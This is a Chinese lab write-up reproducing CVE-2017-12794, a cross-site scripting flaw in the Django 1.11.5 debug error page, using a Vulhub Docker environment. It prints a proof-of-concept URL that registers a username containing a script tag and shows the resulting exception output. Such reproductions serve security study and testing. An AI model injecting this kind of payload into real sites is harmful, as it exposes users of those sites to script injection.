【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)

过期的秋刀鱼-2023-11-05 14:46

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明 内容
漏洞编号 CVE-2017-12794
漏洞名称 Django_debug page_XSS漏洞
漏洞评级
影响范围 1.11.5版本
漏洞描述
修复方案

1.1、漏洞描述

1.11.5版本,修复了500页面中存在的一个XSS漏洞

1.2、漏洞等级

1.3、影响版本

Django 1.11.5版本

1.4、漏洞复现

1、基础环境

Path:Vulhub/django/CVE-2017-12794

启动测试环境:

bash 复制代码 
sudo docker-compose up -d

访问http://your-ip:8000/即可看到

2、漏洞分析

vulhub

3、漏洞验证
复制代码 
http://192.168.8.8:8000/create_user/?username=%3Cscript%3Ealert(1)%3C/script%3E

用户已经被 创建

再次刷新页面触发XSS

抛出异常

python 复制代码 
duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.
相关推荐
曲幽2 小时前
FastAPI 身份验证总踩坑?这份 FastAPI Users “避坑指南”请收好
python·fastapi·web·jwt·oauth2·user·authentication
装不满的克莱因瓶2 小时前
掌握 RNN 与 LSTM 模型结构
人工智能·python·rnn·深度学习·神经网络·ai·lstm
何以解忧,唯有..3 小时前
Python包管理工具pip:从入门到精通
开发语言·python·pip
金銀銅鐵3 小时前
用 Tkinter 实现简单的猜数字游戏
后端·python
copyer_xyf3 小时前
Python 模块与包的导入导出
前端·后端·python
ice8130331814 小时前
【Python】Matplotlib折线图绘制
开发语言·python·matplotlib
copyer_xyf4 小时前
Python venv 虚拟环境
前端·后端·python
林爷万福5 小时前
GitHub 开源光谱数据处理项目推荐
python·光纤光谱仪
copyer_xyf5 小时前
Python 如何同时做很多事:进程、线程、协程
前端·后端·python
Full Stack Developme5 小时前
Spring Bean 依赖注入
python·spring·log4j
热门推荐
01GitHub 镜像站点02Codex 下载安装指南:Windows 和 macOS 官方版下载03【AI】2026 年具身智能模型和世界模型总结042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08CC-Switch & Claude 基于 Linux 服务器安装使用指南09Codex 接入 DeepSeek API 完整配置文档10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法